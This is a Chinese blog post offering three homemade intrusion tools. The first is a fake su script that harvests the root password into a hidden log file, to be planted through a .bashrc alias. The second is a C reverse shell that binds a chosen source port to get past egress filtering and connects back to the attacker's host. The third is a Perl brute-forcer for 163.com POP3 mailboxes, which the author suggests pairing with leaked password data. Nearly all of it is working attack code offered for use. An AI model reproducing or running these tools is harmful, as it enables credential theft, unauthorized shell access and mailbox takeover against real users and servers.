渗透的很多时候,找到的工具并不适用,自己码代码才是王道,下面三个程序都是渗透时在网络上找不到合适工具,自己辛苦开发的,短小实用。
一、记录root密码小工具
root.py
- #!/usr/bin/python
- import os, sys, getpass, time
- current_time = time.strftime("%Y-%m-%d %H:%M")
- logfile="/dev/shm/.su.log" //密码获取后记录在这里
- #CentOS
- #fail_str = "su: incorrect password"
- #Ubuntu
- #fail_str = "su: Authentication failure"
- #For Linux Korea //centos,ubuntu,korea 切换root用户失败提示不一样
- fail_str = "su: incorrect password"
- try:
- passwd = getpass.getpass(prompt=‘Password: ‘);
- file=open(logfile,‘a‘)
- file.write("[%s]t%s"%(passwd, current_time)) //截取root密码
- file.write(‘n‘)
- file.close()
- except:
- pass
- time.sleep(1)
- print fail_str //打印切换root失败提示
渗透linux拿到低权限并提权无果时,将这个程序传上去,再将一个低权限用户目录下的.bashrc添加一句alias su=’/usr/root.py’; 低权限用户su root 后 成功记录密码。密码记录路径请看脚本
二、设置源端口反弹shell
渗透某个linux服务器,反连时目标端口为888不行,53,80还是不行,Ping了下百度,可以ping通。那真相只有一个,服务器变态的限制了只能某些提供已某些端口为源端口去连接外面。
比如:只允许接收对80端口的访问数据包,并以80为源端口向外回复数据。
谷歌程序无果,自己查了相关api后写了个。
client-port.c
- #include
- #include
- #include
- #include
- #include
- void error(char *msg)
- {
- perror(msg);
- exit(0);
- }
- int main(int argc, char *argv[])
- {
- int sockfd, portno, lportno,n;
- struct sockaddr_in serv_addr;
- struct sockaddr_in client_addr;
- struct hostent *server;
- char buffer[256];
- if (argc < 3) {
- fprintf(stderr,"usage %s hostname port LocalPortn", argv[0]);
- exit(0);
- } //三个参数,目标主机,目标主机端口,本地源端口
- portno = atoi(argv[2]);
- sockfd = socket(AF_INET, SOCK_STREAM, 0);
- if (sockfd < 0)
- error("ERROR opening socket");
- bzero((char *) &client_addr, sizeof(client_addr));
- lportno = atoi(argv[3]);
- client_addr.sin_family = AF_INET;
- client_addr.sin_addr.s_addr = INADDR_ANY;
- client_addr.sin_port = htons(lportno); //设置源端口
- if (bind(sockfd, (struct sockaddr *) &client_addr,
- sizeof(client_addr)) < 0)
- error("ERROR on binding");
- server = gethostbyname(argv[1]);
- if (server == NULL) {
- fprintf(stderr,"ERROR, no such host ");
- exit(0);
- }
- bzero((char *) &serv_addr, sizeof(serv_addr));
- serv_addr.sin_family = AF_INET;
- bcopy((char *)server->h_addr,
- (char *)&serv_addr.sin_addr.s_addr,
- server->h_length);
- serv_addr.sin_port = htons(portno);
- if (connect(sockfd,&serv_addr,sizeof(serv_addr)) < 0) //连接
- error("ERROR connecting");
- dup2(fd, 0);
- dup2(fd, 1);
- dup2(fd, 2);
- execl("/bin/sh","sh -i", NULL); //执行shell
- close(fd);
- }
用法:
- gcc client-port.c -o port
- chmod +x port
- ./port 你的IP 你的监听端口 本地的源端口
如 ./port http://www.91ri.org 80 80
成功反弹shell 提权成功
三、邮箱爆破脚本
某个时候,需要爆破一批邮箱。
Burp163.pl
- #!/usr/bin/perl
- use Net::POP3;
- $email="pop.163.com"; //设置pop服务器地址 qq为pop.qq.com
- $pop = Net::POP3->new($email)or die("ERROR: Unable to initiate. ");
- print $pop->banner();
- $pop->quit;
- $i=0;
- open(fp1,"user.txt");
- @array1=<fp1>;
- open(fp2,"pass.txt");
- @array2=<fp2>; //从文件中获取邮箱用户名及密码
- foreach $a(@array1) {
- $u=substr($a,0,length($a)-1);
- $u=$u."@163.com";
- foreach $b(@array2) {
- $p=substr($b,0,length($b)-1);
- print "cracked with ".$u."-----".$p."n";
- $i=$i+1;
- $pop = Net::POP3->new($email)or die("ERROR: Unable to initiate. ");
- $m=$pop->login($u,$p); //尝试登录邮箱
- if($m>0)
- {
- print $u."------------".$p."----"."success"."n";
- $pop->quit;
- } //成功登录
- else
- {
- print $u."------------".$p."----"."failed"."n";
- $pop->quit; //登录失败
- }
- }
- }
- print $i;
用法 将要爆破的邮箱的pop服务器写入下面这一行 默认是163邮箱
- $email="pop.163.com";
再将去除掉@后面部分的邮箱地址比如[email protected] 去除后lusiyu存进去
同目录user.txt中吗,再将字典存进去pass.txt
你会说:这个有点鸡肋吧?万一邮箱的密码很复杂。
呵呵。
搞到了一个小站的数据,用这个程序批量测试密码是否就是邮箱密码。
呵呵,我啥都没说。
入侵渗透专用的python小脚本
时间: 2024-10-11 07:51:10